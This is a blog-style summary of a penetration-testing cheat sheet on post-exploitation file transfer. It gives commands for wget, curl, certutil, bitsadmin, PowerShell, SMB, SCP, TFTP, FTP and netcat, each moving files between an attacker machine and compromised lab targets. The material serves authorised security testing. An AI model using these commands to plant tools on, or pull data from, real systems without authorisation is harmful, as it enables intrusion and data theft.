web analytics

FILE TRANSFER CHEAT SHEET

Rate this post

The document titled “File Transfer Cheat Sheet” provides a comprehensive overview of various methods for transferring files in post-exploitation scenarios, particularly for penetration testing and red team activities. It covers multiple techniques using different tools and protocols, all focused on moving files between systems securely and efficiently. Here’s an extensive summary:

Overview

File transfer is a critical aspect of post-exploitation during penetration testing or red teaming. The document outlines numerous methods to transfer files from an attacker’s machine to a compromised target, providing a detailed step-by-step guide for each tool and protocol. The key methods include using wget, curl, certutil, bitsadmin, PowerShell, SMB server, SCP, TFTP, and FTP.

The setup assumes that the attacker has already gained shell access to the target machine, with examples using both Windows and Linux systems. The attacker’s machine is Kali Linux, while the targets are Windows 10 and Ubuntu systems.

Key File Transfer Methods

1. Wget

Wget is a simple and effective command-line tool to download files from the web. In a Windows environment, it requires specifying the -o flag to save the file, ensuring that the file is downloaded to the correct directory. For example:

bash powershell wget http://192.168.31.141/ignite.txt -o ignite.txt

2. Curl

Curl, like Wget, is another powerful command-line tool for transferring files using various network protocols. The command to download a file using Curl is:

bash curl http://192.168.31.141/ignite.txt -o ignite.txt

3. Certutil

Certutil is a Windows utility primarily used for certificate management but can also be leveraged for file transfers. It can handle large file transfers by splitting files into segments:

bash certutil -urlcache -f http://192.168.31.141/ignite.txt ignite.txt

4. Bitsadmin

Bitsadmin is a Windows command-line tool designed for managing Background Intelligent Transfer Service (BITS) jobs. It can facilitate reliable file downloads even over unstable connections:

bash bitsadmin /transfer job http://192.168.31.141/ignite.txt C:\Users\Public\ignite.txt

5. PowerShell

PowerShell can be used directly to download files by invoking the System.Net.WebClient class. A simple command to download a file would be:

bash powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.31.141/ignite.txt', 'ignite.txt')

6. SMB Server

SMB (Server Message Block) is a protocol used for sharing files over a network. This method utilizes the impacket-smbserver tool to share directories between the attacker’s and target machines:

bash impacket-smbserver share $(pwd) -smb2support
copy \\192.168.31.141\share\ignite.txt

7. SCP (Secure Copy Protocol)

SCP is a secure protocol based on SSH that allows for the transfer of files between systems. It is widely used across both Linux and Windows platforms:

bash scp ignite.txt kali@192.168.31.141:/tmp
scp ignite.txt raj@192.168.31.219:/C:/Temp

8. TFTP (Trivial File Transfer Protocol)

TFTP is a simplified file transfer protocol that operates over UDP, making it lightweight but lacking the reliability features of TCP-based protocols. It’s commonly used in network booting and embedded systems:

bash tftp -i 192.168.31.219 GET ignite.txt

9. FTP (File Transfer Protocol)

FTP is a well-established protocol for file transfer. This document describes setting up an FTP server using Metasploit or Python’s pyftpdlib:

bash use auxiliary/server/ftp
ftp 192.168.31.141
get ignite.txt

Server Setup for File Transfer

In addition to file transfer methods, the document provides instructions for setting up various types of servers to facilitate file transfers, including:

  • Updog: A lightweight HTTP server, replacement for Python’s SimpleHTTPServer.
  • PHP: Using the built-in PHP web server.
  • Python2/3: Running simple HTTP servers using Python’s built-in modules.

Commands to set up servers are as follows:

  • Python3 HTTP Server:
bash python3 -m http.server 8000
  • PHP Server:
bash php -S 0.0.0.0:8081

File Transfer Using Netcat

Netcat (nc) is a versatile tool for establishing simple client-server setups for file transfer. The document describes both sending and receiving files using Netcat between Linux and Windows machines:

  • To send a file from Ubuntu to Kali:
bash nc 192.168.31.141 5555 < file.txt
  • To receive the file on Kali:
bash nc -lvp 5555 > file.txt

Conclusion

The document concludes by summarizing the various tools available for file transfers during penetration testing. It emphasizes that the choice of tool depends on the specific situation and requirements, highlighting the need for flexibility in selecting the right approach for each scenario.

Overall, this cheat sheet serves as a valuable reference for security professionals engaged in post-exploitation activities, offering practical examples and commands for transferring files between compromised machines.

Views: 1

LinkedIn
Twitter
Facebook
WhatsApp
Email

advisor pick´S post